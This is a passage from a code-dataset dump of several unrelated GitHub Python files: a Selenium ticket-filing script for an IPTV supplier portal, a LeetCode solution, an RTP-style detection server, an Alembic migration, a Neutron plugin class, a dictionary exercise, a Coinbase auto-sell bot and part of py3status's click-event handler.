Chrome\r\n \r\n from selenium.webdriver.support.ui import WebDriverWait\r\n from selenium.webdriver.support import expected_conditions as EC\r\n from selenium.webdriver.common.by import By\r\n from selenium.common.exceptions import TimeoutException\r\n\r\n driver = Chrome()\r\n \r\n driver.get(url_fournisseur)\r\n driver.find_element_by_id(\"username\").send_keys(user)\r\n ## pour les 2 cas de l'interface de connexion de l'ihm\r\n try:\r\n driver.find_element_by_id(\"password\").send_keys(mdp)\r\n driver.find_element_by_id(\"submit-button\").click()\r\n except:\r\n driver.find_element_by_id(\"submit-button\").click()\r\n \r\n try:\r\n # Wait as long as required, or maximum of 60 sec for element to appear\r\n # If successful, retrieves the element\r\n element = WebDriverWait(driver,60).until(\r\n EC.presence_of_element_located((By.ID, \"currentPassword\")))\r\n except TimeoutException:\r\n print(\"Echec chargement de la page\")\r\n \r\n driver.find_element_by_id(\"currentPassword\").send_keys(mdp)\r\n driver.find_element_by_id(\"submit-button\").click()\r\n\r\n try:\r\n # Wait as long as required, or maximum of 60 sec for element to appear\r\n # If successful, retrieves the element\r\n element = WebDriverWait(driver,60).until(\r\n EC.presence_of_element_located((By.XPATH, \"//form[@id='userDomainForm']/input[@type='submit']\")))\r\n except TimeoutException:\r\n print(\"Echec chargement de la page\")\r\n\r\n driver.find_element_by_xpath(\"//form[@id='userDomainForm']/input[@type='submit']\").click()\r\n driver.find_element_by_partial_link_text('Dépôt de signalisation').click()\r\n driver.find_element_by_name(\"prestationId1\").send_keys(prestation)\r\n driver.find_element_by_xpath(\"//div[@id='button']/input[@type='submit']\").click()\r\n driver.find_element_by_partial_link_text('Suite dépôt').click()\r\n driver.find_element_by_xpath(\"//div[@id='button']/input[@type='submit']\").click()\r\n\r\n #onglet informations générales\r\n driver.find_element_by_name(\"clientTicketId\").send_keys(numeroTT)\r\n driver.find_element_by_name(\"depositorName\").clear()\r\n driver.find_element_by_name(\"depositorName\").send_keys(\"Bouygtel Service 3x8\")\r\n driver.find_element_by_name(\"depositorPhoneNumber\").clear()\r\n driver.find_element_by_name(\"depositorPhoneNumber\").send_keys(num_telephone)\r\n\r\n #onglet informations complémentaires\r\n driver.find_element_by_partial_link_text('Informations complémentaires').click()\r\n driver.find_element_by_name('INFO_NON').click()\r\n driver.find_element_by_name('INFO_SAIS_PAS_VERIMATRIX').click()\r\n driver.find_element_by_xpath(\"//input[@name='INFO_DLAM_CONCERNE'][@value='ORANGE_BOUYGUES']\").click()\r\n driver.find_element_by_name('INFO_FLUX_TV_OPE').click()\r\n driver.find_element_by_xpath(\"//input[@name='INFO_ADELIA'][@value='PAS_INCIDENT']\").click()\r\n driver.find_element_by_name(\"INFO_ND_1\").send_keys(num_telephone)\r\n\r\n #onglet Défauts constatés\r\n driver.find_element_by_partial_link_text('Défauts constatés').click()\r\n driver.find_element_by_name(typeIncident).click()\r\n driver.find_element_by_name(qualite).click()\r\n driver.find_element_by_name(\"DEFECT_LIBELLE_CHAINE\").send_keys(chaine)\r\n driver.find_element_by_name(\"DEFECT_NUM_ZAP\").send_keys(zap)\r\n driver.find_element_by_name(\"DEFECT_DESCRIPTION\").send_keys(probleme)\r\n if(typeIncident==\"DEFECT_INTERRUPTION\"):\r\n driver.find_element_by_name(\"DEFECT_NATURE_INTERRUPTION\").send_keys(probleme)\r\n elif(typeIncident==\"DEFECT_DEGRADATION\"):\r\n driver.find_element_by_name(\"DEFECT_NATURE_DEGRAD\").send_keys(probleme)\r\n\r\n driver.find_element_by_name(\"description\").send_keys(commentaire)\r\n driver.find_element_by_xpath(\"//*[@value='Déposer']\").click()\r\n\r\n\r\n\r\n\r\ndef messageErreur(message, titre):\r\n from PyQt5.QtWidgets import QMessageBox\r\n from PyQt5.QtCore import Qt\r\n\r\n #il faut une app pour faire un widget messagebox, ici c'est fourni dans le main directement sinon il faut decommenter la ligne du dessous\r\n # appInterne = QApplication(sys.argv)\r\n msgBox = QMessageBox()\r\n msgBox.setIcon(QMessageBox.Information)\r\n msgBox.setText(message)\r\n msgBox.setTextInteractionFlags((Qt.LinksAccessibleByKeyboard\r\n | Qt.LinksAccessibleByMouse\r\n | Qt.TextBrowserInteraction\r\n | Qt.TextSelectableByKeyboard\r\n | Qt.TextSelectableByMouse))\r\n msgBox.setTextFormat(Qt.RichText)\r\n msgBox.setWindowTitle(titre)\r\n msgBox.setStandardButtons(QMessageBox.Ok)\r\n msgBox.exec()\r\n\r\n\r\n\r\n##############################################################################\r\n### GENERAL\r\n##############################################################################\r\n\r\n\r\ndef traitement_general_declenchement_iptv(retour, mdp_orf):\r\n if (retour[1]==\"GCF\"):\r\n #si on a orange déclenchement par l'interface\r\n #d'abord on modifie les informations pour aller avec les valeurs du site :\r\n \r\n #changement de la valeur de type incident par le nom du champ a cliquer correspondant\r\n if (retour[6]==\"Interruption\"):\r\n retour[6]=\"DEFECT_INTERRUPTION\"\r\n elif (retour[6]==\"Dégradation\"):\r\n retour[6]=\"DEFECT_DEGRADATION\"\r\n \r\n #pareil qu'au dessus mais pour la qualité\r\n if (retour[7]==\"HD et SD\"):\r\n retour[7]=\"SD_HD\"\r\n retour[7]=\"DEFECT_TV_\"+retour[7]\r\n \r\n declenchementOrange(mdp_orf, retour[0], retour[2], retour[3], retour[4], retour[5], retour[6], retour[7])\r\n \r\n else:\r\n #sinon on prépare un mail\r\n #lecture du fichier pour trouver le mail du partenaire\r\n destinataire=retour[1]\r\n if (destinataire!=\"Autre\"):\r\n destinataire, cc = rechercheMailPartenaire(destinataire)\r\n \r\n if (destinataire == \"\"):\r\n messageErreur(\"Partenaire non trouvé dans le fichier des adresses mails.\", \"ERREUR partenaire\")\r\n destinataire=\"\"\r\n cc=\"\"\r\n else : \r\n destinataire=\"\"\r\n cc=\"\"\r\n preparationEnvoiMail(retour[0], retour[2], retour[4], retour[5], destinataire, cc)","repo_name":"Matthh9/menu_service","sub_path":"programme_declenchement_iptv.py","file_name":"programme_declenchement_iptv.py","file_ext":"py","file_size_in_byte":8617,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"70482460716","text":"class Solution:\n def suggestedProducts(self, products: List[str], searchWord: str) -> List[List[str]]:\n products.sort()\n result = []\n wordLen = len(searchWord)\n for i in range(1,wordLen+1):\n result.append([])\n for product in products:\n if len(product) >= i and product[:i] == searchWord[:i]:\n result[-1].append(product)\n if len(result[-1]) >= 3: break\n \n return result","repo_name":"BenjaminHalko/LeetCode-Solutions","sub_path":"1268-search-suggestions-system/1268-search-suggestions-system.py","file_name":"1268-search-suggestions-system.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"12994477255","text":"#!/usr/bin/env python\n##\n## server.py - detection server\n##\n## usage:\n## (dummy) $ python server.py\n## (tiny w/cpu) $ python server.py yolov3-tiny.onnx\n## (full w/cuda) $ python server.py -m cuda yolov3-full.onnx\n##\nimport sys\nimport logging\nimport time\nimport selectors\nimport socket\nimport struct\nimport random\nfrom detector import DummyDetector, ONNXDetector\n\n\n## SocketHandler\n##\nclass SocketHandler:\n\n BUFSIZ = 65535\n\n def __init__(self, sock):\n self.logger = logging.getLogger()\n self.sock = sock\n self.addr = sock.getsockname()\n self.loop = None\n self.alive = True\n return\n\n def __repr__(self):\n return f'<{self.__class__.__name__}: addr={self.addr}>'\n\n def idle(self):\n return self.alive\n\n def action(self, ev):\n return\n\n def shutdown(self):\n self.alive = False\n return\n\n def close(self):\n self.sock.close()\n self.sock = None\n self.loop = None\n self.logger.info(f'closed: {self}')\n return\n\n\n## TCPService\n##\nclass TCPService(SocketHandler):\n\n def __init__(self, sock):\n super().__init__(sock)\n self.buf = b''\n return\n\n def action(self, ev):\n try:\n data = self.sock.recv(self.BUFSIZ)\n except OSError:\n self.shutdown()\n return\n if data:\n i0 = 0\n while i0 < len(data):\n i1 = data.find(b'\\n', i0)\n if i1 < 0:\n self.buf += data[i0:]\n break\n self.buf += data[i0:i1+1]\n self.feedline(self.buf)\n self.buf = b''\n i0 = i1+1\n else:\n if self.buf:\n self.feedline(self.buf)\n self.shutdown()\n return\n\n def feedline(self, line):\n return\n\n\n## UDPService\n##\nclass UDPService(SocketHandler):\n\n def __init__(self, sock):\n super().__init__(sock)\n return\n\n def action(self, ev):\n try:\n (data, addr) = self.sock.recvfrom(self.BUFSIZ)\n self.recvdata(data, addr)\n except OSError:\n self.shutdown()\n return\n\n def recvdata(self, data, addr):\n return\n\n\n## TCPServer\n##\nclass TCPServer(SocketHandler):\n\n def __init__(self, port):\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n sock.bind(('', port))\n sock.listen(1)\n super().__init__(sock)\n self.port = port\n self.logger.info(f'listening: port={port}...')\n return\n\n def __repr__(self):\n return f'<{self.__class__.__name__}: port={self.port}>'\n\n def action(self, ev):\n (conn, addr) = self.sock.accept()\n self.logger.info(f'accept: {addr}')\n self.loop.add(self.get_service(conn))\n return\n\n def get_service(self, conn):\n return TCPService(self, conn)\n\n\n## EventLoop\n##\nclass EventLoop:\n\n def __init__(self):\n self.logger = logging.getLogger()\n self.selector = selectors.DefaultSelector()\n self.handlers = {}\n return\n\n def add(self, handler):\n fd = self.selector.register(handler.sock, selectors.EVENT_READ)\n assert fd not in self.handlers\n self.handlers[fd] = handler\n self.logger.info(f'added: {handler}')\n handler.loop = self\n return\n\n def run(self, interval=0.1):\n while True:\n for (fd, ev) in self.selector.select(interval):\n if ev & selectors.EVENT_READ and fd in self.handlers:\n handler = self.handlers[fd]\n handler.action(ev)\n self.idle()\n return\n\n def idle(self):\n removed = []\n for (fd, handler) in self.handlers.items():\n if not handler.idle():\n removed.append((fd, handler))\n for (fd, handler) in removed:\n self.selector.unregister(handler.sock)\n del self.handlers[fd]\n self.logger.info(f'removed: {handler}')\n handler.close()\n return\n\n\n## DetectService\n##\nclass DetectService(UDPService):\n\n CHUNK_SIZE = 40000\n\n def __init__(self, sock, detector, rtp_host, rtp_port, session_id, timeout=10):\n super().__init__(sock)\n self.detector = detector\n self.rtp_host = rtp_host\n self.rtp_port = rtp_port\n self.session_id = session_id\n self.timeout = timeout\n self._recv_buf = b''\n self._recv_seqno = 0\n self._send_seqno = 0\n return\n\n def __repr__(self):\n return f'<{self.__class__.__name__}: rtp_host={self.rtp_host}, rtp_port={self.rtp_port}, session_id={self.session_id}>'\n\n def init(self):\n self.logger.info(f'init: rtp_host={self.rtp_host}, rtp_port={self.rtp_port}, session_id={self.session_id}>')\n data = b'\\x80\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00'\n self.sock.sendto(data, (self.rtp_host, self.rtp_port))\n self._send_seqno += 1\n return\n\n def recvdata(self, data, addr):\n if addr != (self.rtp_host, self.rtp_port): return\n (flags,pt,seqno) = struct.unpack('>BBH', data[:4])\n self.logger.debug(\n f'recv: flags={flags}, pt={pt}, seqno={seqno}')\n if self._recv_seqno != seqno:\n # Packet drop detected. Cancelling the current payload.\n self.logger.info(f'recv: DROP {seqno}/{self._recv_seqno}')\n self._recv_buf = None\n if (pt & 0x7f) == 96 and self._recv_buf is not None:\n self._recv_buf += data[4:]\n if pt & 0x80:\n # Significant packet - ending the payload.\n if self._recv_buf is not None:\n self.process_data(self._recv_buf)\n self._recv_buf = b''\n self._recv_seqno = seqno+1\n return\n\n def process_data(self, data):\n self.logger.debug(f'process_data: {len(data)}')\n if len(data) < 16: return # invalid data\n (tp, reqid, threshold, length) = struct.unpack('>4sLLL', data[:16])\n data = data[16:]\n if len(data) != length: return # missing data\n t0 = time.time()\n results = self.detector.perform(data, threshold=threshold*0.01)\n msec = int((time.time() - t0)*1000)\n buf = b''\n for (klass, conf, x, y, w, h) in results:\n buf += struct.pack(\n '>BBhhhh', klass, int(conf*255),\n int(x), int(y), int(w), int(h))\n header = struct.pack('>4sLLL', b'YOLO', reqid, msec, len(buf))\n self.send(header+buf)\n return\n\n def send(self, data, chunk_size=CHUNK_SIZE):\n i0 = 0\n while i0 < len(data):\n i1 = i0 + chunk_size\n pt = 96\n if len(data) <= i1:\n pt |= 0x80\n header = struct.pack('>BBH', 0x80, pt, self._send_seqno & 0xffff)\n self._send_seqno += 1\n segment = data[i0:i1]\n self.sock.sendto(header+segment, (self.rtp_host, self.rtp_port))\n i0 = i1\n return\n\n## RTSPService\n##\nclass RTSPService(TCPService):\n\n def __init__(self, sock, detectors):\n super().__init__(sock)\n self.detectors = detectors\n self.service = None\n return\n\n def feedline(self, req):\n (cmd,_,args) = req.strip().partition(b' ')\n cmd = cmd.upper()\n if cmd == b'FEED':\n self.startfeed(args)\n else:\n self.sock.send(b'!UNKNOWN\\r\\n')\n self.logger.error(f'unknown command: req={req!r}')\n return\n\n def close(self):\n super().close()\n if self.service is not None:\n self.service.shutdown()\n self.service = None\n return\n\n # startfeed: \"FEED clientport path\"\n def startfeed(self, args):\n self.logger.debug(f'startfeed: args={args!r}')\n flds = args.split()\n if len(flds) < 2:\n self.sock.send(b'!INVALID\\r\\n')\n self.logger.error(f'startfeed: invalid args: args={args!r}')\n return\n try:\n rtp_port = int(flds[0])\n path = flds[1].decode('utf-8')\n detector = self.detectors[path]\n except (UnicodeError, ValueError, KeyError):\n self.sock.send(b'!INVALID\\r\\n')\n self.logger.error(f'startfeed: invalid args: args={args!r}')\n return\n (rtp_host, _) = self.sock.getpeername()\n # random.randbytes() is only supported in 3.9.\n session_id = bytes( random.randrange(256) for _ in range(4) )\n sock_rtp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n sock_rtp.setblocking(False)\n sock_rtp.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n sock_rtp.bind(('', 0))\n (_, port) = sock_rtp.getsockname()\n self.logger.info(f'startfeed: port={port}, rtp_host={rtp_host}, rtp_port={rtp_port}, session_id={session_id.hex()}, path={path}, detector={detector}')\n text = f'+OK {port} {session_id.hex()}'\n self.sock.send(text.encode('ascii')+b'\\r\\n')\n self.service = DetectService(\n sock_rtp, detector, rtp_host, rtp_port, session_id)\n self.service.init()\n self.loop.add(self.service)\n return\n\n## RTSPServer\n##\nclass RTSPServer(TCPServer):\n\n def __init__(self, port, detectors):\n super().__init__(port)\n self.detectors = detectors\n return\n\n def get_service(self, conn):\n return RTSPService(conn, self.detectors)\n\n# main\ndef main(argv):\n import getopt\n def usage():\n print(f'usage: {argv[0]} [-d] [-o dbgout] [-m mode] [-s port] [-t interval] [name:num_classes:onnx]')\n return 100\n try:\n (opts, args) = getopt.getopt(argv[1:], 'do:m:s:t:')\n except getopt.GetoptError:\n return usage()\n level = logging.INFO\n mode = None\n server_port = 10000\n interval = 0.1\n dbgout = None\n for (k, v) in opts:\n if k == '-d': level = logging.DEBUG\n elif k == '-o': dbgout = v\n elif k == '-m': mode = v\n elif k == '-s': server_port = int(v)\n elif k == '-t': interval = float(v)\n logging.basicConfig(format='%(asctime)s %(levelname)s %(message)s', level=level)\n\n # Server mode.\n detectors = {}\n if args:\n for arg in args:\n (name,num_classes,path) = arg.split(':')\n detector = ONNXDetector(path, mode=mode, num_classes=int(num_classes), dbgout=dbgout)\n detectors[name] = detector\n else:\n detectors['detect'] = DummyDetector(dbgout=dbgout)\n logging.info(f'detectors={detectors}')\n loop = EventLoop()\n loop.add(RTSPServer(server_port, detectors))\n loop.run(interval)\n return 0\n\nif __name__ == '__main__': sys.exit(main(sys.argv))\n","repo_name":"euske/fastdet","sub_path":"server/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":10790,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"40526234511","text":"\"\"\"add_food_model\n\nRevision ID: 8e40e31eff4d\nRevises: 3bb17e0138f8\nCreate Date: 2019-12-12 14:03:43.353943\n\n\"\"\"\nimport sqlalchemy as sa\nfrom alembic import op\n\n# revision identifiers, used by Alembic.\nrevision = '8e40e31eff4d'\ndown_revision = '3bb17e0138f8'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('food_order',\n sa.Column('food_order_id', sa.Integer(), nullable=False),\n sa.Column('order_date', sa.Date(), nullable=True),\n sa.Column('ordering_user_id', sa.Integer(), nullable=True),\n sa.Column('link', sa.String(length=512), nullable=True),\n sa.ForeignKeyConstraint(['ordering_user_id'], ['users.user_id'], ),\n sa.PrimaryKeyConstraint('food_order_id')\n )\n op.create_table('food_order_item',\n sa.Column('food_order_item_id', sa.Integer(), nullable=False),\n sa.Column('food_order_id', sa.Integer(), nullable=True),\n sa.Column('eating_user_id', sa.Integer(), nullable=True),\n sa.Column('description', sa.String(length=255), nullable=True),\n sa.Column('cost', sa.DECIMAL(precision=18, scale=2), nullable=True),\n sa.Column('paid', sa.Boolean(), nullable=True),\n sa.Column('surrender', sa.Boolean(), nullable=True),\n sa.ForeignKeyConstraint(['eating_user_id'], ['users.user_id'], ),\n sa.ForeignKeyConstraint(['food_order_id'], ['food_order.food_order_id'], ),\n sa.PrimaryKeyConstraint('food_order_item_id')\n )\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('food_order_item')\n op.drop_table('food_order')\n # ### end Alembic commands ###\n","repo_name":"nexocodecom/nisse.io","sub_path":"migrations/versions/8e40e31eff4d_add_food_model.py","file_name":"8e40e31eff4d_add_food_model.py","file_ext":"py","file_size_in_byte":1652,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"72834715435","text":"import six\n\nfrom neutron._i18n import _\n\nfrom nuage_neutron.plugins.common.base_plugin import BaseNuagePlugin\nfrom nuage_neutron.plugins.common import exceptions\nfrom nuage_neutron.plugins.common import utils as nuage_utils\n\n\nclass VsdPassthroughResource(BaseNuagePlugin):\n vsd_to_os = {}\n os_to_vsd = {}\n vsd_filterables = []\n extra_filters = []\n filters_to_ignore = ['tenant_id']\n\n def osfilters_to_vsdfilters(self, filters):\n for f in self.filters_to_ignore:\n filters.pop(f, None)\n if not all(x in self.vsd_filterables for x in filters or []):\n msg = (_(\"Only %s are filterable fields\")\n % (self.vsd_filterables + self.extra_filters))\n raise exceptions.NuageBadRequest(msg=msg)\n return nuage_utils.filters_to_vsd_filters(self.vsd_filterables,\n filters,\n self.os_to_vsd)\n\n def map_vsd_to_os(self, resource, fields=None):\n return self._translate_dict(resource, self.vsd_to_os, fields=fields)\n\n def map_os_to_vsd(self, resource, fields=None):\n return self._translate_dict(resource, self.os_to_vsd, fields=fields)\n\n def _translate_dict(self, resource, translation_mapping, fields=None):\n dict = {}\n for key, value in six.iteritems(translation_mapping):\n if hasattr(value, '__call__'):\n value(resource, dict)\n elif key in resource:\n dict[value] = resource[key]\n return self._fields(dict, fields)\n","repo_name":"nuagenetworks/nuage-openstack-neutron","sub_path":"nuage_neutron/plugins/common/service_plugins/vsd_passthrough_resource.py","file_name":"vsd_passthrough_resource.py","file_ext":"py","file_size_in_byte":1578,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"73"} +{"seq_id":"15774691937","text":"\n#insert deta\n\ndef insert_dict(a_list = {}, key = None, val = None):\n if type(a_list) != dict:\n print(\"Invalid type. You need to enter a dictionary type. you entered\",type(a_list))\n elif key == None or val == None:\n print(\"Please enter a name and birth date.\")\n elif key in a_list:\n print(f\"{key} has been already inserted.\")\n else:\n a_list[key] = val\n print(\"Successful inserted!!\")\n select_dict(a_list, key)\n\n#select data\n\ndef select_dict(a_list = {}, key = None):\n if type(a_list) != dict:\n print(\"Invalid type. You need to enter a dictionary type. you entered\",type(a_list))\n elif key == None:\n print(\"Please enter data to search for.\")\n elif key not in a_list:\n print(f\"{key} is not found.\")\n else:\n print(f\"{key} : \",a_list[key])\n\n#update data\n\ndef update_dict(a_list = {}, key = None, val = None):\n if type(a_list) != dict:\n print(\"Invalid type. You need to enter a dictionary type. you entered\",type(a_list))\n elif key == None or val == None:\n print(\"Please enter name and birth date to update.\")\n elif key not in a_list:\n print(f\"{key} is not found and can't update.\" )\n else:\n a_list[key] = val\n print(\"Successful updated!\")\n select_dict(a_list, key)\n\n#delete data \n\ndef delete_dict(a_list = {}, key = None):\n if type(a_list) != dict:\n print(\"Invalid type. You need to enter a dictionary type. you entered\",type(a_list))\n elif key == None:\n print(\"Please enter name to delete.\")\n elif key not in a_list:\n print(f\"{key} is not found and can't delete.\" )\n else:\n del a_list[key]\n print(\"Successful deleted!\")\n select_dict(a_list, key)\n\n\nbts = { \n \"jin\" : 921204,\n \"suga\" : 930309,\n \"J-hope\" : 940218,\n \"RM\" : 9409,\n \"jimin\" : 951013,\n \"v\" : 951230,\n \"abc\" : 123456\n}\n\nprint(bts)\nprint()\ninsert_dict(\"jungkook\",970901)\ninsert_dict(bts,\"jungkook\")\ninsert_dict(bts,\"jungkook\",970901)\ninsert_dict(bts,\"jungkook\",970901)\nprint()\nselect_dict(\"v\")\nselect_dict(bts)\nselect_dict(bts,\"v\")\nselect_dict(bts,\"rm\")\nprint()\nupdate_dict(\"RM\",940912)\nupdate_dict(bts,\"RM\")\nupdate_dict(bts,\"RM\",940912)\nupdate_dict(bts,\"rm\",940912)\nprint()\ndelete_dict(\"abc\")\ndelete_dict(bts)\ndelete_dict(bts,\"abc\")\ndelete_dict(bts,\"abc\")\nprint()\nprint(bts)\n","repo_name":"naturalMin/jm_study","sub_path":"Python_Webscrapper_nomad/bts_dict.py","file_name":"bts_dict.py","file_ext":"py","file_size_in_byte":2224,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"467120347","text":"import time\nfrom ExRates import MyExRates\nfrom currency import MyCurrency\nfrom datalogger import DataLogger\nfrom endpoints import *\n\ndef set_transfers(accounts, payment_methods):\n accountList = accounts.get_accounts()['accounts']\n pmList = payment_methods.get_payment_methods()['payment_methods']\n \n accountID = ''\n pmID =''\n \n iii = 1\n for account in accountList:\n if account['type'] == 'wallet':\n account.update(enum=str(iii))\n print(account['enum'] + ' - ' + account['name'])\n iii += 1\n\n optAccount = input('Select which wallet to monitor: ')\n for account in accountList:\n if account['type'] == 'wallet':\n if account['enum'] == optAccount:\n accountID = account['id']\n\n print()\n\n iii = 1\n for pm in pmList:\n pm.update(enum=str(iii))\n print(pm['enum'] + ' - ' + pm['name'])\n iii += 1\n\n optAccount = input('Select which account to pay from / sell to: ')\n for pm in pmList:\n if pm['enum'] == optAccount:\n pmID = pm['id']\n\n return Transfers(accountID, pmID)\n\ndef loop(client, account_currency, payment_method_currency, transfers):\n sell_target = 141.00 \n quote_sell_at = 0.95 # Ratio of sell price when quotes will be obtained (0.00 to 1.00)\n\n exRates = MyExRates(client.client, account_currency, payment_method_currency)\n data_logger = DataLogger(exRates.dict, 'pricelog.csv')\n \n while True:\n exRates = MyExRates(client.client, account_currency, payment_method_currency)\n account = client.client.get_account(transfers.wallet)\n\n spot_value = exRates.spot_price * float(account['balance']['amount'])\n \n print()\n print('Account Balance: ' + str(account['balance']['amount']) + ' ' + account['balance']['currency'])\n print('Spot Price: ' + str(exRates.spot_price))\n print('Spot Value: ' + str(spot_value))\n print('Spot value at ' + str(\"%.2f\" % (spot_value / sell_target * 100)) + '% of target (' + str(sell_target) +').')\n\n if spot_value > sell_target * quote_sell_at:\n quote = client.client.sell(transfers.wallet,\n amount=str(account['balance']['amount']),\n currency='BTC',\n payment_method=transfers.payment_method,\n quote=True)\n\n print('Spot price within ' + str(quote_sell_at * 100) + '% of target - Getting quote')\n if float(quote['total']['amount']) > sell_target:\n print('Attempting Sell')\n sell = client.client.sell(transfers.wallet,\n amount=str(account['balance']['amount']),\n currency=account['balance']['currency'],\n payment_method=transfers.payment_method,\n quote=False)\n \n print('Sold ' + sell['total']['amount'])\n else:\n print('Quote of ' + quote['total']['amount'] + ' too low - No sell')\n\n data_logger.add_line(exRates.dict)\n time.sleep(10)\n \n\ndef main():\n\n \n connected = False\n while not connected:\n myClient = MyClient()\n connected = myClient.connected\n\n if connected:\n myUser = MyUser(myClient.client)\n myAccounts = MyAccounts(myClient.client)\n myPaymentMethods = MyPaymentMethods(myClient.client)\n transfers = set_transfers(myAccounts, myPaymentMethods)\n \n account_currency = MyCurrency(myClient.client,\n myAccounts.get_account(transfers.wallet)['currency'])\n\n payment_method_currency = MyCurrency(myClient.client,\n myPaymentMethods.get_payment_method(transfers.payment_method)['currency'])\n\n exRates = MyExRates(myClient.client, account_currency, payment_method_currency)\n \n\n loop(myClient, account_currency, payment_method_currency, transfers)\n\nif __name__ == '__main__': \n main()\n \n","repo_name":"MikoG/clever-coins","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4107,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"2019054059","text":"import select\nimport sys\nfrom json import loads\nfrom shlex import quote as shell_quote\nfrom subprocess import PIPE, Popen\nfrom threading import Thread\n\nfrom py3status.profiling import profile\n\n\nclass IOPoller:\n \"\"\"\n This class implements a predictive and timing-out I/O reader\n using select and the poll() mechanism for greater compatibility.\n \"\"\"\n\n def __init__(self, io, eventmask=select.POLLIN):\n \"\"\"\n Our default is to read (POLLIN) the specified 'io' file descriptor.\n \"\"\"\n self.io = io\n self.poller = select.poll()\n self.poller.register(io, eventmask)\n\n def readline(self, timeout=500):\n \"\"\"\n Try to read our I/O for 'timeout' milliseconds, return None otherwise.\n This makes calling and reading I/O non blocking !\n \"\"\"\n poll_result = self.poller.poll(timeout)\n if poll_result:\n line = self.io.readline().strip()\n # when using pydev.debugger sys.stdin gets overwritten and placed\n # into sys.stdin.original_stdin issue #2090\n if self.io == getattr(sys.stdin, \"original_stdin\", sys.stdin) and line == \"[\":\n # skip first event line wrt issue #19\n line = self.io.readline().strip()\n try:\n # python3 compatibility code\n line = line.decode()\n except (AttributeError, UnicodeDecodeError):\n pass\n return line\n else:\n return None\n\n\nclass EventTask:\n \"\"\"\n A simple task that can be run by the scheduler.\n \"\"\"\n\n def __init__(self, module_name, event, default_event, events_thread):\n self.events_thread = events_thread\n self.module_full_name = module_name\n self.default_event = default_event\n self.event = event\n\n def run(self):\n self.events_thread.process_event(self.module_full_name, self.event, self.default_event)\n\n\nclass EventClickTask:\n \"\"\"\n A task to run an external on_click event\n \"\"\"\n\n def __init__(self, module_name, event, events_thread, command):\n self.events_thread = events_thread\n self.module_name = module_name\n self.command = command\n self.event = event\n\n def run(self):\n self.events_thread.on_click_dispatcher(self.module_name, self.event, self.command)\n\n\nclass Events(Thread):\n \"\"\"\n This class is responsible for dispatching event JSONs sent by the i3bar.\n \"\"\"\n\n def __init__(self, py3_wrapper):\n \"\"\"\n We need to poll stdin to receive i3bar messages.\n \"\"\"\n Thread.__init__(self)\n self.config = py3_wrapper.config\n self.error = None\n self.py3_config = py3_wrapper.config[\"py3_config\"]\n self.modules = py3_wrapper.modules\n self.on_click = self.py3_config[\"on_click\"]\n self.output_modules = py3_wrapper.output_modules\n self.poller_inp = IOPoller(sys.stdin)\n self.py3_wrapper = py3_wrapper\n\n def get_module_text(self, module_name, event):\n \"\"\"\n Get the full text for the module as well as the partial text if the\n module is a composite. Partial text is the text for just the single\n section of a composite.\n \"\"\"\n index = event.get(\"index\")\n module_info = self.py3_wrapper.output_modules.get(module_name)\n output = module_info[\"module\"].get_latest()\n full_text = \"\".join(out[\"full_text\"] for out in output)\n\n partial = None\n if index is not None:\n if isinstance(index, int):\n partial = output[index]\n else:\n for item in output:\n if item.get(\"index\") == index:\n partial = item\n break\n if partial:\n partial_text = partial[\"full_text\"]\n else:\n partial_text = full_text\n return full_text, partial_text\n\n def on_click_dispatcher(self, module_name, event, command):\n \"\"\"\n Dispatch on_click config parameters to either:\n - Our own methods for special py3status commands (listed below)\n - The i3-msg program which is part of i3wm\n \"\"\"\n if command is None:\n return\n elif command == \"refresh_all\":\n self.py3_wrapper.refresh_modules()\n elif command == \"refresh\":\n self.py3_wrapper.refresh_modules(module_name)\n else:\n # In commands we are able to use substitutions for the text output\n # of a module\n if \"$OUTPUT\" in command or \"$OUTPUT_PART\" in command:\n full_text, partial_text = self.get_module_text(module_name, event)\n command = command.replace(\"$OUTPUT_PART\", shell_quote(partial_text))\n command = command.replace(\"$OUTPUT\", shell_quote(full_text))\n\n # this is a i3 message\n self.wm_msg(module_name, command)\n # to make the bar more responsive to users we ask for a refresh\n # of the module or of i3status if the module is an i3status one\n self.py3_wrapper.refresh_modules(module_name)\n\n def wm_msg(self, module_name, command):\n \"\"\"\n Execute the message with i3-msg or swaymsg and log its output.\n \"\"\"\n wm_msg = self.config[\"wm\"][\"msg\"]\n pipe = Popen([wm_msg, command], stdout=PIPE)\n self.py3_wrapper.log(\n '{} module=\"{}\" command=\"{}\" stdout={}'.format(\n wm_msg, module_name, command, pipe.stdout.read()\n )\n )\n\n def process_event(self, module_name, event, default_event=False):\n \"\"\"\n Process the event for the named module.\n Events may have been declared in i3status.conf, modules may have\n on_click() functions. There is a default middle click event etc.\n \"\"\"\n\n # get the module that the event is for\n module_info = self.output_modules.get(module_name)\n\n # if module is a py3status one call it.\n if module_info[\"type\"] == \"py3status\":\n module = module_info[\"module\"]\n module.click_event(event)\n if self.config[\"debug\"]:\n self.py3_wrapper.log(f\"dispatching event {event}\")\n\n # to make the bar more responsive to users we refresh the module\n # unless the on_click event called py3.prevent_refresh()\n if not module.prevent_refresh:\n self.py3_wrapper.refresh_modules(module_name)\n default_event = False\n\n if default_event:\n # default button 2 action is to clear this method's cache\n if self.config[\"debug\"]:\n self.py3_wrapper.log(f\"dispatching default event {event}\")\n 